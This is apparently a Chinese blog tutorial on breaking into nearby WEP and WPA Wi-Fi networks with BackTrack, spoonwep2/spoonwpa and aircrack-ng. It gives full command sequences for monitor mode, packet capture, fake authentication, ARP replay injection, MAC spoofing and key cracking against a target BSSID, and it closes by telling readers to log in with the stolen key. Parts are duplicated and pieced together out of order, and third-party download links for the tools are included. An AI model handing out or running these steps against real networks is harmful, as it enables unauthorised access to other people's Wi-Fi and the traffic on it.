bt4破解教程

bt4破解教程

一、准备篇

1、一个有可破解无线信号的环境。如我在家随便搜索出来的信号。

2、带无线网卡的电脑一台(笔记本台式机均可,只要无线网卡兼容BT3),我用 的是三星NC10的上网本。

3、2G以上优盘一个(我用的是kingston 8G 的)

4、搜索 下载BT3,约800兆。或BT4,约900兆。

BT3下载地址: http://f1.soft-3h0jae9frd1g.chnxp.com.cn/BACKTRACK3final_usb.rar

BT4 下载地址: http://ftp.belnet.be/mirror/backtrack/bt4-beta.iso

注:BT3 全称BackTrack3,与我们常说的bt下载是完全不同的概念。以我理解就是集成了一些计算机安全软件的linux系统。正是由于它的出世和不断普 及,使得破解可让普通用户轻易言之。

5、搜索下载spoonwep2中文包。地址: http://gd.qiannao.com:8080/servlet/FileDownload?filename=//yinghu/上 传分享/2008/11/13/中文包_spoonwep2.rar&vid=0

注:spoonwep2就是我们的破 解软件,一个非常强悍的图形化破解WEP无线网络密码的工具。

二、安装篇

1、将优盘格式化,配置如下图,唯一要注意文件系统选为FAT32就可以了。

2、将刚才下载完成的bt3解压缩,复制到优盘,完成后会看到优盘目录下有两个文件夹,一个boot 一个BT3。如下图:

3、开始安装bt3系统。

点击开始-运行,输入 CMD, 然后回车,进入命令行模式 。

首先输入你优盘的盘符,我这里是h盘,输入h: 然后回车,接下来输入 cd boot 回车,进入到boot文件夹下,最后 bootinst.bat 回车,就会开始安装BT3,如下图:

然后安装会出现一个提示画面,我们别去管它,直接按任意键继续

按任意键后,电脑会自动设置引导记录,整个过程大概10秒左右。出现下面画面 后,此优盘就可以引导系统进去bt3了。

4、集成 spoonwep2软件。

首先把我们先前下载的spoonwep2解压缩,里面是六个扩展名为lzm的文件,将这六个文件复制 到优盘\bt3\modules文件夹下,如图:

这样我们的 bt3系统已经集成安装完毕了,可以动手破解了。

破解篇

1、将安装好系统的优盘插入电脑,重启后进入bios,设置优盘为电脑第一启动顺序。(这个如果没设置过,可以问一下其他人,或者在网上找找设置方法,每 台电脑进入bios的方法也不同,如开机按F2,Del,F1等等)

2、设置优盘启动后,电脑会自动带入我们进入bt3操作系 统(如果出现界面选择,你要选择vesa mode),系统界面是这样的(漂亮吧):

开始输入指令
    ifconfig -a 查看网卡(之后只出现eth0和lo则表示你的无线网卡没有被识别,要是有eth0、wlan、lo等则表示可以)
如果出现wlan网卡(本机无线网卡),则进行

    ifconfig -a wlan0 up(此命令用于加载网卡,有的时候直接执行spoonwep是不可以的,需要加载)

然后执行ln -fs bash/bin/sh
再执行 ls -all /bin/sh(显示bash为成功,显示dash为失败)

现在开始破解
1.shell窗口中输入 ifconfig 命令 ,出现如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2.找出你的无线网卡名字,我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入 ifconfig 命令 ,返回如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
命令中的11 表示要破解的频道号,bssid后面的数字表示破解目标的MAC物理地址,outputs表示要生成的包的名称。回车运行。
4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址,00:A1:C1:D8:A5:B6表示本机网卡MAC物理地址
5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
获取更多的数据包。
6.返回数据量到1万的时候就可以破解了。再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功,让它继续抓包,直到破解。
3、启动spoonwep2软件

开启一个命令窗口,输入:spoonwep 回车后10秒钟左右弹出spoonwep2程序:

clip_image001

NET CARD 网卡接口 选择 WLAN0
DRIVER 驱动 选择 NORMAL
MODE 模式 选择 UNKNOWN VICTIM

点 NEXT 转到 VICTIMS DISCOVERY 窗口

clip_image002

CHAN HOPPING 是全频段扫描 (建议选择: FIXED CHAN,有针对性的扫描)
点击右上角 LAUNCH 按钮 (点完后会变成 ABORT ) 这时会弹出抓包窗口,可作为参考,也可不用理会。20秒

首先点击左上角下拉菜单选择CHAN HOPPING→LAUNCH(点完后会变成ABORT )→会开始自动执行

clip_image003
注:

ESSID 路由广播名称

MAC 路由的地址

CHAN 使用的频道

POW 信号强度

DATA 数据包

CLIS 空白代表无客户端,打钩则代表有客户端;

(备注:无线网卡搜索一阵子,被搜索到的无线信号的SSID将会列表显示。如果某加密无线信号的CLIS方框内有“勾”,表示该无线信号此刻托有客户端,这时破解会高效、快速一些。如果你选中了这样的的信号,紧接着窗口的下方会显示出客户端代表,你应该把下方的客户端也选中1想参与破解。不要迷信一定要带客户端才能破解,没有客户端的AP也可以破解,里路上POW值大于18的都可以破解的。)

有客户端模式比无客户端模式成功率要高,选中打算破解的路由,下面会显示出当前所有链接到这个路由的客户端,选择一个POWER PACKETS都比较高的客户端。

然后点 SELECTION OK 转到 ATTACK PANEL 窗口

clip_image004

第一个下拉菜单有4个选项,后面3个都可作为无客户端攻击模式,其中 :
ARP REPLAY ATTACK (有客户端时用)
P0841 REPLAY ATTACK (次次选)
CHOPCHOP & FORGEATTACK (次选)
FRAGMENTATION & FORGE ATTACK (首选)
第二个下拉菜单有3个选项,其中:
??? LENGTH (不指定加密位数,首选)
128 BITS LENGTH (指定128位加密,次次选)
64 BITS LENGTH (指定64位加密,次选)
两个下拉菜单右边的 Inj Rate 是每秒发包数量,选默认的600即可。
选择好两个下拉菜单,点击左边 LAUNCH 按钮 开始自动破解,破解速度和信号强度成正比。

clip_image005

最下面的WEP KEY就是破解出来的密码,无需输入冒号。

注:有客户端模式比无客户端成功率要高。

注:破解WPA加密时,输入命令为spoonwpa,其他操作步骤不变(但一定需要有客户端连接才能破解)

BT4破解教程

一、spoonwep- wpa破解工具用于BT4下的deb安装包
迅雷下载地址:(已经修正下载地址, 打开迅雷, 然后复制以下地址即 可)thunder://QUFodHRwOi8vbXkueHd0b3AuY29tL2ZpbGVteS8yMDA5MDUxNy82NzljMTNkMi4xLmRlYlpa
二、 运行unetbootin制作BT4的U盘启动系统。
点确定就开始制作了。
在这里需要泡杯茶点支烟等一下。
从ISO文件 里提取文件拷贝到U盘里需要一段时间。
完成之后,不要重启, 再把刚刚下到的“spoonwep-wpa破解工具用于BT4下的deb安装包”手动拷贝到U盘根目录下面, 自己记好它好的名字, 方便到BT4下找到它。
三、启动BT4
在BIOS里面设置从U盘启动, 这个无法截图, 自己摸索吧。呵呵~~
四、 进入BT4
登陆的用户名:root,密码:toor
startx命令启动图形化界面。
五、安装 spoonwep-wpa-rc3.deb包
点击左下角的开始菜单,点击一个叫system mune的弹出菜单,再点击“storeage media”,会打开一个窗口,点击窗口上面有个刷新的按钮,在窗口下面空白的地方会列出你的硬盘和外设,进入U盘,找到刚才放入的spoonwep- wpa-rc3.deb,把这个文件复制到BT4的桌面(其实就是/root),可以直接拖到桌面,打开命令行窗口
运行“dpkg -i spoonwep-wpa-rc3.deb”
稍等几秒中,桌面上出现desktop的文件夹,里面就有了 spoonwep2+spoonwpa,好了,大功告成,直接单击图标就能运行spoonwep2或spoonwpa了。
也可以输入以下 命令执行:
spoonwep2 执行:
spoonwep2
spoonwpa 执行:
spoonwpa
六、 开始破解!!!!
1、打开一个SHELL,

输入ifconfig -a

2、可以输入macchange -m 00:11:22:33:44:55 wlan0 来改变本机的MAC地址,

3、输入airmon-ng start wlan0 6

4、输入aireplay-ng   -9 mon0

5、加载网卡输入ifconfig -a wlan0 up

6、输入ln -fs bash/bin/sh

7、输入ls -al /bin/sh(这个命令可以显示是否设置成功,显示bash为成功, dash为失败)
【spoonwep2 破解法】
输入spoonwep2回车后就会弹出spoonwep2的窗口。
点击SPOONWEP SETTINGS,在NET CARD里选WLAN0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索,然后关闭spoonwep2再开一下,点击SPOONWEP SETTINGS,在NET CARD里选MON0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦,选定1个网卡点击SELECTION OK,选定PO841 REPLAY ATTACK(这里有4条命令选择),点击LAUNCH后就等待密码的出来(sata数据包到30000个左右)。
【spoonwpa 破解法】
输入spoonwpa回车后就会弹出spoonwpa的窗口。
在NET CARD里选WLAN0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索,然后关闭spoonwpa再开一下,点击SPOONWEP SETTINGS,在NET CARD里选MON0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦,选定1个必须有客户端的网卡点击SELECTION OK, 再点击LAUNCH AUTOMATED HANDSHAKE CAPTURE,如抓到握手包,请点击金色锁开始破解,这完全靠运气了。
七、 用你破解出来的密码去登陆吧

http://blog.tianya.cn/blogger/post_show.asp?BlogID=2446622&PostID=20778253

从硬盘启动BT3和BT4破解教程http://blog.sina.com.cn/s/blog_5ee22a410100fjo8.html

BT4中文版(集成spoonwep2/spoonwpa)下载地址
http://www.rayfile.com/zh-cn/files/bff1b980-66e6-11de-a445-0019d11a795f/
http://www.rayfile.com/zh-cn/files/82ef1823-66d3-11de-a60d-0019d11a795f/
http://www.rayfile.com/zh-cn/files/69667f23-66b9-11de-94dd-0014221b798a/

全功能版本的BT3(dvd版 集成各种驱动 spoonwep
http://www.rayfile.com/zh-cn/files/cf44a345-2755-11de-a577-0019d11a795f/

BackTrack4 (BT4)最终版 (2010年1月11日版http://blog.sina.com.cn/s/blog_568be75b0100gu3h.html?k=bt4&t=utf-8

3 完成以上的步骤后就开始破解啦

启动建好的虚拟机,加载BT3,注意如果找不到卡王的话,就“虚拟机-可移动设备-USB设备-Realtak可移动设备”

clip_image006

接着就是正式破解了,打开一个shell输入命令有2种(2选一)

(1) Airodump-ng –w 1 wlan0

(2)airodump-ng --ivs -w 123 -c 6 wlan0

clip_image007

回车,开始抓包,出现下图这样的是抓包成功

clip_image008

小强解释抓包的数据:

a.BSSID 下面所对应的是你要攻击破解的路由AP的MAC地址。(要拿笔纸抄下)

b.PWR 值 PWR值代表信号强度。值越高越好。一般高于30就可以很容易的破解。

此处优先选择值高者破解

c.DATA 数据包。 下面所对应的AP(路由)如果有数值(不为0)就说明有客户端。

有客户端者优先破解。为0者先放弃。当然如果在破解时,此值为0.也可以破解。只是时间会长点。

且成功率降低。

d.ESSID 此务必记住 ,此为AP(路由的名字)

e.以上请一一对应记好

f.请务必选择 cipher下为wep的破解。如是wap或非wep者则放弃非wep者目前仍未有好的方法破解。

很明显,你要破的是哪一个吧?用第一个来做示范!

00:14:78:8B:F3:44

打开第二个shell,输入命令 spoonwep

clip_image009

回车后会自动出现一个新窗口

clip_image010

在第一行中输入你选择的那个BSSID(刚刚小强叫抄的哦)

NET CARD 选择WLANO

clip_image011

Inj rate 可以移动到1000

LAUNCH 选择PO841这个

clip_image012

接着点击LAUNCH,就等着密码出来吧

clip_image013

这个比较快,大概就三分钟的样子 WEP KEY:6471686474(密码就是红色那个去掉2个数字之间的冒号)

最佳答案

一、既然有系统了,

1.一个U盘启动制作工具就行:unetbootin-windows-356

下载地址:http://www.atuonce.cn/blog/attachments/month_0906/t2009621225526.rar

2.spoonwep-wpa破解工具用于BT4下的deb安装包

迅雷下载地址:(已经修正下载地址, 打开迅雷, 然后复制以下地址即可)thunder://QUFodHRwOi8vbXkueHd0b3AuY29tL2ZpbGVteS8yMDA5MDUxNy82NzljMTNkMi4xLmRlYlpa

二、运行unetbootin制作BT4的U盘启动系统。

点确定就开始制作了。

在这里需要泡杯茶点支烟等一下。

从ISO文件里提取文件拷贝到U盘里需要一段时间。

完成之后,不要重启, 再把刚刚下到的“spoonwep-wpa破解工具用于BT4下的deb安装包”手动拷贝到U盘根目录下面, 自己记好它好的名字, 方便到BT4下找到它。

三、启动BT4

在BIOS里面设置从U盘启动, 这个无法截图, 自己摸索吧。呵呵~~

四、进入BT4

登陆的用户名:root,密码:toor

startx命令启动图形化界面。

五、安装spoonwep-wpa-rc3.deb包

点击左下角的开始菜单,点击一个叫system mune的弹出菜单,再点击“storeage media”,会打开一个窗口,点击窗口上面有个刷新的按钮,在窗口下面空白的地方会列出你的硬盘和外设,进入U盘,找到刚才放入的spoonwep-wpa-rc3.deb,把这个文件复制到BT4的桌面(其实就是/root),可以直接拖到桌面,打开命令行窗口

运行“dpkg -i spoonwep-wpa-rc3.deb”

稍等几秒中,桌面上出现desktop的文件夹,里面就有了spoonwep2+spoonwpa,好了,大功告成,直接单击图标就能运行spoonwep2或spoonwpa了。

也可以输入以下命令执行:

spoonwep2 执行:

spoonwep2

spoonwpa 执行:

spoonwpa

六、开始破解!!!!

【spoonwep2 破解法】

输入spoonwep2回车后就会弹出spoonwep2的窗口。

点击SPOONWEP SETTINGS,在NET CARD里选WLAN0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索,然后关闭spoonwep2再开一下,点击SPOONWEP SETTINGS,在NET CARD里选MON0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦,选定1个网卡点击SELECTION OK,选定PO841 REPLAY ATTACK(这里有4条命令选择),点击LAUNCH后就等待密码的出来(sata数据包到30000个左右)。

【spoonwpa 破解法】

输入spoonwpa回车后就会弹出spoonwpa的窗口。

在NET CARD里选WLAN0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索,然后关闭spoonwpa再开一下,点击SPOONWEP SETTINGS,在NET CARD里选MON0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦,选定1个必须有客户端的网卡点击SELECTION OK, 再点击LAUNCH AUTOMATED HANDSHAKE CAPTURE,如抓到握手包,请点击金色锁开始破解,这完全靠运气了。

七、用你破解出来的密码去登陆吧

clip_image014

150

2 安装虚拟机,见下图

点新建虚拟机

clip_image015

典型安装

clip_image016

选择LINUX,注意版本选择 other linux 2.6.x kernel!

clip_image017

按下一步是提示虚拟主机名字和要安装的位置(自定)

clip_image019

选择使用网络地址翻译

clip_image020

下一步完成

clip_image022
点击绿色按钮启动

你可能感兴趣的:(搜索,无线网卡,下载地址,台式机,在家)